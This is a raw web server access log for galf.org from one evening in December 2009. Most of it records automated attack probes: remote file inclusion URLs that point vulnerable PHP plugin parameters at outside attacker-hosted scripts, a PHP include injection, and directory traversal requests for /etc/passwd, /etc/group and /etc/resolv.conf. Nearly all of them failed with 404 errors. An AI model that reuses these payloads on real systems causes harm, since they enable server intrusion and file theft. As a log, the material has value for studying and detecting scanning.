61.47.7.71 - - [27/Dec/2009:21:30:04 -0800] "GET /logs///include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.160.17.200 - - [27/Dec/2009:21:30:08 -0800] "GET /logs//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:30:08 -0800] "GET /logs/access.log%20%20//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:30:08 -0800] "GET /components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [27/Dec/2009:21:31:28 -0800] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [27/Dec/2009:21:31:28 -0800] "GET /logs///include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [27/Dec/2009:21:31:28 -0800] "GET /logs/access_090921.log///include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [27/Dec/2009:21:33:14 -0800] "GET /logs///include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [27/Dec/2009:21:33:14 -0800] "GET /logs/access.log///include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [27/Dec/2009:21:33:14 -0800] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.219.195.66 - - [27/Dec/2009:21:34:34 -0800] "GET /appserv/main.php?appserv_root=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
200.219.195.66 - - [27/Dec/2009:21:34:35 -0800] "GET /appserv/main.php?appserv_root=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
200.219.195.66 - - [27/Dec/2009:21:34:35 -0800] "GET /logs//appserv/main.php?appserv_root=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
200.219.195.66 - - [27/Dec/2009:21:34:37 -0800] "GET /logs//appserv/main.php?appserv_root=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
61.47.7.71 - - [27/Dec/2009:21:34:58 -0800] "GET /logs///include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [27/Dec/2009:21:34:58 -0800] "GET /logs/access_090921.log///include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [27/Dec/2009:21:34:58 -0800] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.214.127.225 - - [27/Dec/2009:21:35:22 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.214.127.225 - - [27/Dec/2009:21:35:43 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.214.127.225 - - [27/Dec/2009:21:35:43 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.214.127.225 - - [27/Dec/2009:21:35:43 -0800] "GET /logs/access_091012.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [27/Dec/2009:21:37:09 -0800] "GET /logs/access_090706.log/main.php?pagina=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [27/Dec/2009:21:37:09 -0800] "GET /logs/main.php?pagina=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [27/Dec/2009:21:37:09 -0800] "GET /main.php?pagina=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.214.127.225 - - [27/Dec/2009:21:37:40 -0800] "GET /logs/access_090706.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:39:06 -0800] "GET /logs/access_091123.log//zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:39:07 -0800] "GET /logs/access_091123.log//zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:39:07 -0800] "GET /zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:39:07 -0800] "GET /logs//zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:39:07 -0800] "GET /logs//zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:39:07 -0800] "GET /logs/access_090720.log//zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:39:07 -0800] "GET /zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:39:07 -0800] "GET /logs/access_090720.log//zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:39:51 -0800] "GET /logs/access_091026.log//zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:39:51 -0800] "GET /logs/access_091026.log//zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:40:03 -0800] "GET /logs/access_090713.log//zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:40:03 -0800] "GET /logs/access_090713.log//zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:40:17 -0800] "GET /logs/access_090817.log//zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:40:18 -0800] "GET /logs/access_090817.log//zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:40:33 -0800] "GET /logs/access_090706.log//zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:40:33 -0800] "GET /logs/access_090706.log//zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:41:00 -0800] "GET /logs/access_090615.log//zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:41:01 -0800] "GET /logs/access_090615.log//zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:41:07 -0800] "GET /logs/access_090824.log//zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:41:07 -0800] "GET /logs/access_090824.log//zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:41:23 -0800] "GET /logs/access_090622.log//zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:41:24 -0800] "GET /logs/access_090622.log//zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
115.68.3.94 - - [27/Dec/2009:21:42:21 -0800] "GET /logs/access_090921.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.xenguide.pe.kr/log/plug_in_config/id/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
115.68.3.94 - - [27/Dec/2009:21:42:21 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.xenguide.pe.kr/log/plug_in_config/id/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
115.68.3.94 - - [27/Dec/2009:21:42:28 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.xenguide.pe.kr/log/plug_in_config/id/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:42:41 -0800] "GET /logs/access_090817.log%20//zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:42:42 -0800] "GET /logs/access_090817.log%20//zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:42:45 -0800] "GET /logs/access_090824.log%20//zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:21:42:45 -0800] "GET /logs/access_090824.log%20//zipndownload.php?PP_PATH=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
89.203.208.203 - - [27/Dec/2009:21:48:06 -0800] "GET /logs/access_091123.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ferieispania.no/calendar/events/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
89.203.208.203 - - [27/Dec/2009:21:48:08 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ferieispania.no/calendar/events/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
89.203.208.203 - - [27/Dec/2009:21:48:09 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ferieispania.no/calendar/events/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
89.203.208.203 - - [27/Dec/2009:21:48:35 -0800] "GET /logs/access_090629.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ferieispania.no/calendar/events/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
89.203.208.203 - - [27/Dec/2009:21:48:37 -0800] "GET /logs/access_090629.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ferieispania.no/calendar/events/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
89.203.208.203 - - [27/Dec/2009:21:49:25 -0800] "GET /logs/access_090629.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.ferieispania.no/calendar/events/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:53:33 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:53:33 -0800] "GET /logs/access_091116.log%20%20//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:53:33 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:53:35 -0800] "GET /logs/access_091116.log%20%20//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:53:35 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:53:35 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:53:47 -0800] "GET /logs/access_091116.log%20%20//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:53:47 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:53:47 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:53:48 -0800] "GET /logs/access_091116.log%20%20//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:53:49 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:53:49 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.42 - - [27/Dec/2009:21:55:27 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=50&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705; yplus 4.1.00b)" "www.galf.org"
128.241.54.188 - - [27/Dec/2009:21:58:10 -0800] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aigleboots.com//administrator/components/com_virtuemart/.../idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [27/Dec/2009:21:58:10 -0800] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aigleboots.com//administrator/components/com_virtuemart/.../idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [27/Dec/2009:21:58:11 -0800] "GET /logs/access_090720.log%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aigleboots.com//administrator/components/com_virtuemart/.../idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [27/Dec/2009:21:58:15 -0800] "GET /logs/access_091012.log%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aigleboots.com//administrator/components/com_virtuemart/.../idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [27/Dec/2009:22:00:21 -0800] "GET /logs/access.log%20%20///include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.198.4.237 - - [27/Dec/2009:22:02:17 -0800] "GET /logs/access_091026.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://phoenix-model.com/zfxid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.198.4.237 - - [27/Dec/2009:22:02:18 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://phoenix-model.com/zfxid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.198.4.237 - - [27/Dec/2009:22:02:18 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://phoenix-model.com/zfxid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [27/Dec/2009:22:03:19 -0800] "GET /calendar//tools/send_reminders.php?noSet=0&includedir=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [27/Dec/2009:22:03:19 -0800] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [27/Dec/2009:22:03:19 -0800] "GET /logs/access_091102.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.198.4.237 - - [27/Dec/2009:22:03:57 -0800] "GET /logs/access_091123.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://phoenix-model.com/zfxid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:22:04:11 -0800] "GET /home.php?content=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.4.113.98 - - [27/Dec/2009:22:04:12 -0800] "GET /logs/access.log%20%20/home.php?content=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.4.113.98 - - [27/Dec/2009:22:04:12 -0800] "GET /logs/home.php?content=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
204.202.2.23 - - [27/Dec/2009:22:04:19 -0800] "GET /logs/access_090706.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:22:05:11 -0800] "GET /home.php?content=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.4.113.98 - - [27/Dec/2009:22:05:11 -0800] "GET /logs/home.php?content=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.4.113.98 - - [27/Dec/2009:22:05:11 -0800] "GET /logs/access.log%20%20/home.php?content=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
128.241.54.188 - - [27/Dec/2009:22:06:31 -0800] "GET /logs/access_090706.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aigleboots.com//administrator/components/com_virtuemart/.../idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [27/Dec/2009:22:09:53 -0800] "GET /home.php?content=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.4.113.98 - - [27/Dec/2009:22:09:53 -0800] "GET /logs/home.php?content=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.4.113.98 - - [27/Dec/2009:22:09:53 -0800] "GET /logs/access.log/home.php?content=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.4.113.98 - - [27/Dec/2009:22:12:08 -0800] "GET /logs/access.log/home.php?content=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.4.113.98 - - [27/Dec/2009:22:12:13 -0800] "GET /logs/access.log/home.php?content=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.24.131.38 - - [27/Dec/2009:22:12:39 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
190.24.131.38 - - [27/Dec/2009:22:12:39 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
65.55.207.93 - - [27/Dec/2009:22:16:03 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
213.198.4.237 - - [27/Dec/2009:22:20:21 -0800] "GET /logs/access_091026.log////skin/ggambo7002_board/comment_modify.php?dir=http://phoenix-model.com/zfxid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.198.4.237 - - [27/Dec/2009:22:21:40 -0800] "GET /logs/access_091123.log////skin/ggambo7002_board/comment_modify.php?dir=http://phoenix-model.com/zfxid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.93 - - [27/Dec/2009:22:25:42 -0800] "GET /labia/?N=A HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
188.158.65.231 - - [27/Dec/2009:22:25:48 -0800] "GET / HTTP/1.1" 200 1048 "http://www.google.com/url?sa=t&source=web&ct=res&cd=4&ved=0CBEQFjAD&url=http%3A%2F%2Fwww.galf.org%2F&rct=j&q=www.galf.com&ei=LU84S8CCIYTu0wTmhviDCA&usg=AFQjCNERd4SZQQqlPprrsvqdZNrkkQv4xA" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "www.galf.org"
188.158.65.231 - - [27/Dec/2009:22:25:49 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "www.galf.org"
67.195.37.161 - - [27/Dec/2009:22:27:47 -0800] "GET /logs/ HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
65.55.207.72 - - [27/Dec/2009:22:30:09 -0800] "GET /cendoc/?D=A HTTP/1.1" 200 526 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
208.97.183.26 - - [27/Dec/2009:22:31:07 -0800] "GET /lib/gore.php?libpath=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.97.183.26 - - [27/Dec/2009:22:31:07 -0800] "GET /lib/gore.php?libpath=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
63.247.66.42 - - [27/Dec/2009:22:31:11 -0800] "GET /SQuery/lib/gore.php?libpath=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
63.247.66.42 - - [27/Dec/2009:22:31:11 -0800] "GET /SQuery/lib/gore.php?libpath=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
213.198.4.237 - - [27/Dec/2009:22:33:34 -0800] "GET /logs/access_090921.log////skin/ggambo7002_board/comment_modify.php?dir=http://phoenix-model.com/zfxid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [27/Dec/2009:22:36:06 -0800] "GET /logs/access_090720.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aigleboots.com//administrator/components/com_virtuemart/.../idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [27/Dec/2009:22:36:06 -0800] "GET /logs/access_091012.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aigleboots.com//administrator/components/com_virtuemart/.../idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [27/Dec/2009:22:36:08 -0800] "GET / HTTP/1.1" 200 1048 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:37:03 -0800] "GET /logs/access_091123.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:37:04 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:37:04 -0800] "GET /logs/access_091123.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:22:37:04 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
